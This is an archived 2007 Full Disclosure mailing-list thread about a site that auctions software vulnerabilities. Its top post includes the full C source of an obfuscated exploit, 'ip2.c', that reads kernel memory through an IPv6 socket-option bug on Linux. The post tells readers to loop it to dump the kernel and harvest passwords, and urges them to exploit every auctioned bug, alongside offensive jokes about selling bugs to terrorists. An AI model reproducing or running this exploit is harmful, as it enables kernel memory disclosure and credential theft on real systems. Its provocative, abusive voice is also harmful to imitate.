Full Disclosure mailing list archives
An Auction Site for Vulnerabilities
From: "Joey Mengele" <joey.mengele () hushmail com>
Date: Mon, 09 Jul 2007 13:44:14 -0400
Yes, Fakhar has put it best in English so far. As a sidenote, WabiSabi seems to have removed my account from their system already for unknown reasons. However, included inline is a simple exploit for one of the few bugs they are making available for currency exchange. I think you will find it trivial to find and exploit most (all?) of their other bugs, even those that aren't publicly documented ;) Linux Torvalds documented this particular bug here: http://bugzilla.kernel.org/show_bug.cgi?id=8134 I don't understand why it is for sale. The following program can be used to hack 4 bytes out of kernel memory. Put it in a loop to dump all of the kernel. If you use an insecure program that hasn't been reviewed by the OpenBsD Secure Shell team, you might find unscrubbed passwords in there. I encourage everyone to research and release exploits for every bug on the auction block. Remember: it is only consistent with REAL hacker ethics to sell bugs to terrorists, NAMBLA, and similar organizations such as GOBBLES/n3td3v. J __ ip2.c __ // advanced exploit code for catastrophic kernel bug by Joey Mengele, professional hacker // user, to dump 0xaddress from kernel memory: ./ip2 0xaddress #include <sys/signal.h> typedef int fg8; #include <sys/mman.h> typedef long _l36; #include <string.h> typedef long * jayn9124; #include <stdio.h> typedef char * anal; #include <netinet/in.h> #define __exit main #define __main exit typedef void pleb; #include <stdlib.h> fg8 ___hh(fg8,_l36,jayn9124); #include <unistd.h> pleb _zzy(); # define __f4 setsockopt # define __f5 getsockopt fg8 __exit(fg8 argc, anal *argv[]) { _l36 tmp; fg8 s; _l36 hud; if (argc!=2) __main(-1); if (1 != sscanf(argv[1]," 0x%x",&hud)) __main(-1); signal(SIGSEGV,&exit); s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); _zzy(); __f4(s, IPPROTO_IPV6, 6, (void *)NULL, 0); ___hh(s,hud,&tmp); printf("Kernel memory @ %.8x contains %.8x\n",hud,tmp); return 0; } int ___hh(int bf,_l36 _rtg,jayn9124 rape) { fg8 ot=4; *(jayn9124)(0x8) = _rtg; return __f5(bf,IPPROTO_IPV6,59,(void *)rape,&ot); } void _zzy() { _l36 *gol = NULL; if( (gol = mmap( (void *)NULL, 4096, PROT_READ|PROT_WRITE, MAP_FIXED |MAP_ANONYMOUS | MAP_PRIVATE, 0, 0 )) == (void *) -1 ) {perror( "mmap" );exit(412);} } __ ip2.c EOF __ On Mon, 09 Jul 2007 02:41:57 -0400 Fakhar Imran <fakharmtc () yahoo com> wrote:
Well... I believe that ppl do know vulns, that are not discussed/discovered by tech companies or open forums, and they use it for their personal gains. Its just a matter of single transaction that needs to be happen and it'll spread like a wild fire. cheers ----- Original Message ---- From: evilrabbi <evilrabbi () gmail com> To: Fakhar Imran <fakharmtc () yahoo com> Cc: Untitled <full-disclosure () lists grok org uk> Sent: Friday, July 6, 2007 7:29:02 PM Subject: Re: [Full-disclosure] An Auction Site for Vulnerabilities I wonder how long it's going to be untill someone finds a vuln in that site then tries to auction it off. On 7/6/07, Fakhar Imran <fakharmtc () yahoo com> wrote: Thanks for the information ----- Original Message ---- From: Ivan . < ivanhec () gmail com> To: Untitled <full-disclosure () lists grok org uk> Sent: Friday, July 6, 2007 11:38:17 AM Subject: [Full-disclosure] An Auction Site for Vulnerabilities http://www.darkreading.com/document.asp?doc_id=128411&WT.svl=news1_ 1 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___________________________________________________________________ _________________ Pinpoint customers who are looking for what you sell. http://searchmarketing.yahoo.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- h0 h0 h0 -- www.nopsled.net ___________________________________________________________________ _________________ Bored stiff? Loosen up... Download and play hundreds of games for free on Yahoo! Games. http://games.yahoo.com/games/front
-- Click for special offer on replacement windows - energy efficient http://tagline.hushmail.com/fc/Ioyw6h4eNoTcOxzEIQa8ZCqjSiLl3KdHV7Zyg0oKADI3bmKeS2TEXu/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- An Auction Site for Vulnerabilities Joey Mengele (Jul 09)
- Re: An Auction Site for Vulnerabilities Stian Øvrevåge (Jul 09)